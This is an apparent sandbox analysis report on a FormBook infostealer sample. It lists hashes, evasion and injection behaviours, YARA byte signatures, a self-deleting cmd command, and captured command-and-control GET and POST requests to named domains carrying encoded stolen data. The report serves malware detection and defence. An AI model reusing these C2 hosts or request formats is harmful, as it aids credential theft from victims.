Analysis Report scn14092020.scr

Overview

General Information

Sample Name: scn14092020.scr (renamed file extension from scr to exe)
Analysis ID: 285348
MD5: f028d6c9991258c5c75e9f234d4dee79
SHA1: 2f6b7f76bb4a3342f3450e1cc9ef539c2028c59e
SHA256: 576f0ed5ae69ececc1bb11492479101c0281af46cb86a73eae9195376ab02717

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • scn14092020.exe (PID: 7148 cmdline: 'C:\Users\user\Desktop\scn14092020.exe' MD5: F028D6C9991258C5C75E9F234D4DEE79)
    • scn14092020.exe (PID: 4604 cmdline: C:\Users\user\Desktop\scn14092020.exe MD5: F028D6C9991258C5C75E9F234D4DEE79)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 4452 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 5684 cmdline: /c del 'C:\Users\user\Desktop\scn14092020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
  • 0x160ec:$sqlite3step: 68 34 1C 7B E1
  • 0x16008:$sqlite3text: 68 38 2A 90 C5
  • 0x1612d:$sqlite3text: 68 38 2A 90 C5
  • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x8248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x85d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13ee5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x139d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13fe7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1415f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x8fea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12c4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9d62:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d67:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19dda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
[Click to see the 16 entries]

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.scn14092020.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
1.2.scn14092020.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.scn14092020.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
  • 0x160ec:$sqlite3step: 68 34 1C 7B E1
  • 0x16008:$sqlite3text: 68 38 2A 90 C5
  • 0x1612d:$sqlite3text: 68 38 2A 90 C5
  • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
1.2.scn14092020.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
1.2.scn14092020.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
[Click to see the 1 entries]

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: scn14092020.exe | Virustotal: Detection: 17%
Source: scn14092020.exe | ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: scn14092020.exe | Joe Sandbox ML: detected
Source: 1.2.scn14092020.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_024BF460 FindFirstFileW,FindNextFileW,FindClose,4_2_024BF460
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_024BF459 FindFirstFileW,FindNextFileW,FindClose,4_2_024BF459
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_024BF585 FindFirstFileW,FindNextFileW,FindClose,4_2_024BF585
Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-44h] 0_2_0316CA70
Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 4x nop then jmp 0316DB82h 0_2_0316CF79
Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 4x nop then pop edi 1_2_00415001
Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 4x nop then pop edi 1_2_0040C119
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi 4_2_024C5001
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi 4_2_024BC119

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49738
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?Bh=chLTAJW8o&jDHXN=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P HTTP/1.1
    Host: www.brasserie-lafayette.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?jDHXN=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&Bh=chLTAJW8o HTTP/1.1
    Host: www.clicrhonealpes.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?Bh=chLTAJW8o&jDHXN=WJb/CysgWCw91yJWs6LNuDX/buU9ws/TxtuWb/JnOd32EuNV24o2CESIFihwpFgP5dzA HTTP/1.1
    Host: www.animalsnecessity.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?jDHXN=3OckiECOiD+psyI+NQjFIxWDb4gozbrDIe4cjEZ2xT/QUh3byTqlra9o3wyRY1odpqBV&Bh=chLTAJW8o HTTP/1.1
    Host: www.uuid.blue
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?Bh=chLTAJW8o&jDHXN=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd HTTP/1.1
    Host: www.keebcat.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?jDHXN=KZXmcMedBwfhNG72Yprv36X6G3gBjgWEN6ED81KrdGuEeSGip76GxhQuMQ345P+ATXiO&Bh=chLTAJW8o HTTP/1.1
    Host: www.revolucaomindfulness.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?Bh=chLTAJW8o&jDHXN=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qNSTnwpHMJRP HTTP/1.1
    Host: www.aktivasi-asuransi-bukalapak.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?jDHXN=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuFg5MktW3Bd&Bh=chLTAJW8o HTTP/1.1
    Host: www.hqxmf.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?jDHXN=CECJ5NlVRfC6rcavsOdFHLgWBVmwF6tqPRsoe/u97wTXDE14KZP6Fmisn7GjwDc8cLbW&Bh=chLTAJW8o HTTP/1.1
    Host: www.hivepublications.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?Bh=chLTAJW8o&jDHXN=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vqP2//3Rjw/o HTTP/1.1
    Host: www.chehol.directory
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /d9s8/?jDHXN=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHspK9JZO7aDS&Bh=chLTAJW8o HTTP/1.1
    Host: www.martjeje2.info
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: Joe Sandbox View | IP Address: 209.99.40.222
Source: Joe Sandbox View | IP Address: 164.132.235.17
Source: Joe Sandbox View | IP Address: 164.132.235.17
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View | ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK
Source: Joe Sandbox View | ASN Name: OVHFR
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.clicrhonealpes.com
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.clicrhonealpes.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.clicrhonealpes.com/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 53 34 64 2d 58 57 65 72 4a 79 4e 59 71 63 39 53 72 34 59 45 39 4d 52 6e 74 39 41 55 50 6b 62 4c 72 45 41 75 7e 76 4c 57 34 67 61 6a 35 59 49 55 47 47 58 6d 6b 74 4f 6c 52 76 72 4d 48 72 7a 35 42 78 39 47 41 79 58 5f 39 61 44 31 54 35 4b 75 30 7a 65 66 7a 46 6b 4f 67 68 6d 78 69 4c 39 2d 58 67 68 33 53 6d 30 62 74 55 67 79 45 65 31 65 6e 43 45 71 4a 37 75 75 6b 70 44 72 68 45 50 74 65 68 77 6c 75 39 37 4d 6b 57 59 34 64 31 4e 6e 45 4b 55 5f 59 6c 55 63 49 65 35 46 70 6a 56 45 73 30 56 4c 6b 36 6d 56 61 41 74 5a 69 76 44 5f 67 77 64 6b 4a 5a 6e 68 61 58 4e 4b 41 4b 4c 78 68 4f 4e 59 54 57 6e 67 54 52 79 49 32 51 72 76 4a 41 6c 5a 73 63 79 75 44 51 4d 5a 4c 4e 53 61 32 4e 41 43 36 6f 6f 63 51 2d 39 54 54 7a 39 6c 69 6a 33 32 65 46 55 4c 62 6c 69 53 43 31 58 56 37 6d 34 55 6c 5a 30 2d 36 76 6d 65 62 74 7a 48 47 5f 55 44 73 55 63 59 4d 68 4b 46 53 52 4f 52 70 43 73 6b 6e 66 67 6f 54 6c 30 64 55 57 4d 61 62 65 7e 43 36 5f 67 7a 74 30 28 34 62 68 72 65 66 31 67 36 79 4e 61 6b 54 4d 4f 36 4c 37 37 37 52 58 51 34 6d 43 46 75 77 70 41 4e 7a 53 6d 64 6b 49 56 75 48 43 28 79 57 31 31 41 45 56 30 70 79 33 53 51 67 46 77 44 4e 43 6f 68 71 58 66 6f 61 55 56 4e 71 36 78 52 6e 50 69 63 61 37 6a 6b 6a 77 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=S4d-XWerJyNYqc9Sr4YE9MRnt9AUPkbLrEAu~vLW4gaj5YIUGGXmktOlRvrMHrz5Bx9GAyX_9aD1T5Ku0zefzFkOghmxiL9-Xgh3Sm0btUgyEe1enCEqJ7uukpDrhEPtehwlu97MkWY4d1NnEKU_YlUcIe5FpjVEs0VLk6mVaAtZivD_gwdkJZnhaXNKAKLxhONYTWngTRyI2QrvJAlZscyuDQMZLNSa2NAC6oocQ-9TTz9lij32eFULbliSC1XV7m4UlZ0-6vmebtzHG_UDsUcYMhKFSRORpCsknfgoTl0dUWMabe~C6_gzt0(4bhref1g6yNakTMO6L777RXQ4mCFuwpANzSmdkIVuHC(yW11AEV0py3SQgFwDNCohqXfoaUVNq6xRnPica7jkjw).
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.animalsnecessity.com
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.animalsnecessity.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.animalsnecessity.com/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 5a 4c 76 46 63 56 55 48 61 6c 6b 76 6f 31 49 46 30 64 66 58 28 54 72 50 58 66 31 67 33 66 76 77 6a 37 4c 54 49 50 30 39 50 76 54 32 42 71 4e 62 77 49 70 6b 4f 69 61 45 61 54 74 73 6b 46 39 66 6a 70 7a 64 70 66 71 70 33 43 6a 49 75 6a 68 6d 4d 34 78 56 7a 61 42 45 71 71 77 79 28 48 79 66 71 6d 56 66 28 58 4e 47 79 30 48 55 73 69 6a 73 31 64 7a 67 6d 44 64 51 72 68 4d 44 4e 54 42 2d 48 69 32 36 78 58 58 4a 56 48 76 6b 46 39 6d 66 37 6f 49 67 58 30 54 37 64 43 5a 5a 39 71 37 4e 59 73 5a 79 79 65 4b 42 61 2d 51 71 28 70 44 4a 74 4a 53 53 50 37 68 64 35 57 72 6e 43 4c 6e 41 70 75 5a 37 38 45 33 39 4d 5f 75 38 6f 75 77 76 6c 69 28 53 33 6a 68 41 4f 77 45 43 6f 46 28 44 31 71 51 6b 37 56 7a 50 7e 65 63 74 55 47 46 45 4b 6a 7a 31 38 30 33 39 58 69 6d 4e 31 54 76 73 54 66 32 5f 57 75 74 30 72 4e 58 6a 72 49 56 79 63 48 4b 51 61 57 78 4c 75 46 51 56 48 56 73 36 65 45 7e 41 71 6d 72 79 66 37 71 33 70 32 50 65 61 30 4e 4a 6a 75 6f 69 4b 59 36 4f 74 4b 39 4a 35 64 7a 79 70 38 64 65 61 43 69 42 45 65 48 59 64 67 4c 41 70 4f 4d 50 4d 45 50 52 31 76 61 33 79 36 35 2d 35 4f 6c 67 74 53 6e 41 6a 44 65 70 61 68 53 42 54 66 32 37 68 5a 55 4c 69 6e 4d 61 58 36 75 41 7a 49 28 4d 5a 77 6e 49 69 56 4d 2d 73 67 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=ZLvFcVUHalkvo1IF0dfX(TrPXf1g3fvwj7LTIP09PvT2BqNbwIpkOiaEaTtskF9fjpzdpfqp3CjIujhmM4xVzaBEqqwy(HyfqmVf(XNGy0HUsijs1dzgmDdQrhMDNTB-Hi26xXXJVHvkF9mf7oIgX0T7dCZZ9q7NYsZyyeKBa-Qq(pDJtJSSP7hd5WrnCLnApuZ78E39M_u8ouwvli(S3jhAOwECoF(D1qQk7VzP~ectUGFEKjz18039XimN1TvsTf2_Wut0rNXjrIVycHKQaWxLuFQVHVs6eE~Aqmryf7q3p2Pea0NJjuoiKY6OtK9J5dzyp8deaCiBEeHYdgLApOMPMEPR1va3y65-5OlgtSnAjDepahSBTf27hZULinMaX6uAzI(MZwnIiVM-sg).
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.uuid.blue
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.uuid.blue
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.uuid.blue/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 34 4d 6f 65 38 68 4f 73 76 78 71 56 7e 7a 39 4a 61 58 4c 5a 4a 30 69 7a 58 36 34 76 35 72 7a 34 52 4c 4e 61 7e 55 6c 74 36 44 28 4e 55 77 62 46 34 79 75 38 6b 65 73 55 73 41 7a 33 58 55 55 75 33 66 31 4f 55 67 71 35 54 61 55 63 6b 55 55 79 51 48 61 44 52 5a 4a 68 54 49 52 58 43 64 34 37 6d 58 56 55 35 47 28 70 61 6a 6e 6b 70 48 6b 6d 34 57 7e 4b 50 39 38 58 44 76 32 5f 78 36 52 5a 39 78 5a 52 70 64 38 31 75 6f 43 67 34 6f 53 4f 55 73 50 57 75 33 44 70 64 37 74 78 57 45 7e 70 44 36 49 4c 6b 4e 5a 7a 55 2d 69 56 34 58 34 42 4a 2d 4c 52 42 56 50 4a 57 56 38 78 53 73 7a 6d 7e 73 64 57 4d 66 4d 52 4e 6c 4c 6a 72 5f 70 38 48 51 42 76 57 58 47 37 79 6b 74 49 62 52 4f 44 6c 5f 52 41 51 76 59 50 56 44 6c 74 69 4d 58 79 35 4e 49 62 6e 54 76 41 79 74 46 72 4a 76 48 2d 4d 69 7a 6f 75 34 64 53 53 70 75 4c 35 5a 55 6b 68 56 64 4c 28 64 4f 2d 4e 45 70 59 31 55 7a 48 5a 73 34 2d 62 7a 6c 35 54 68 6c 4a 47 33 33 43 6c 74 4a 57 64 35 57 42 74 41 67 2d 78 79 53 36 6a 30 37 4b 41 77 79 61 6f 35 46 55 63 51 54 36 6d 36 35 6a 56 33 6e 75 75 33 34 32 48 65 59 51 69 4b 38 52 54 6d 67 7a 37 61 31 6a 77 49 62 42 71 31 4b 57 56 70 48 67 35 4c 47 43 6b 79 35 42 49 6e 49 70 48 43 62 79 4d 4f 6b 53 64 6d 62 56 54 77 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=4Moe8hOsvxqV~z9JaXLZJ0izX64v5rz4RLNa~Ult6D(NUwbF4yu8kesUsAz3XUUu3f1OUgq5TaUckUUyQHaDRZJhTIRXCd47mXVU5G(pajnkpHkm4W~KP98XDv2_x6RZ9xZRpd81uoCg4oSOUsPWu3Dpd7txWE~pD6ILkNZzU-iV4X4BJ-LRBVPJWV8xSszm~sdWMfMRNlLjr_p8HQBvWXG7yktIbRODl_RAQvYPVDltiMXy5NIbnTvAytFrJvH-Mizou4dSSpuL5ZUkhVdL(dO-NEpY1UzHZs4-bzl5ThlJG33CltJWd5WBtAg-xyS6j07KAwyao5FUcQT6m65jV3nuu342HeYQiK8RTmgz7a1jwIbBq1KWVpHg5LGCky5BInIpHCbyMOkSdmbVTw).
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.keebcat.com
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.keebcat.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.keebcat.com/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 5f 50 39 72 45 42 70 61 50 48 47 64 37 4c 42 6e 65 74 59 6e 63 53 6c 68 4a 43 43 76 74 43 6d 35 31 42 67 62 41 79 44 58 45 7a 47 33 72 71 33 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 52 4e 64 33 30 75 73 61 71 36 78 55 74 74 73 31 75 77 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tp_P9rEBpaPHGd7LBnetYncSlhJCCvtCm51BgbAyDXEzG3rq3~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zORNd30usaq6xUtts1uw).
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.revolucaomindfulness.com
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.revolucaomindfulness.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.revolucaomindfulness.com/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 46 62 6a 63 43 70 75 51 4b 53 7a 70 4d 32 65 71 46 5a 69 5a 6c 74 33 34 41 45 59 76 31 78 75 44 49 4f 56 47 70 30 4b 74 57 54 33 43 57 7a 58 34 73 4a 48 6b 33 52 49 6f 51 78 4c 31 7a 61 53 6e 50 42 36 47 39 57 65 32 55 67 4d 31 46 66 4d 4e 50 59 42 61 72 31 46 30 66 70 52 69 38 6a 75 59 57 65 65 2d 48 31 79 68 34 33 75 77 53 31 35 57 6b 6d 50 42 28 57 4a 42 57 63 42 4b 77 32 6a 67 33 66 57 63 70 6c 56 4e 56 6c 7e 65 50 79 31 47 38 6e 46 68 6b 4c 5a 35 6b 55 5a 47 43 68 63 34 42 6d 49 49 73 30 69 53 53 50 55 57 65 76 5a 71 37 4d 30 53 65 66 4d 69 43 57 54 32 44 5f 37 32 65 6a 36 4f 59 54 78 32 28 44 75 73 74 34 73 65 46 42 73 37 5a 48 71 74 4a 56 56 4d 32 46 54 6d 34 32 52 31 6e 39 33 49 59 4c 47 42 35 4f 59 41 46 44 74 36 67 30 28 32 48 7a 51 55 34 4d 73 32 66 64 76 61 7a 62 47 4e 4a 58 4f 59 37 4b 59 4b 77 77 4e 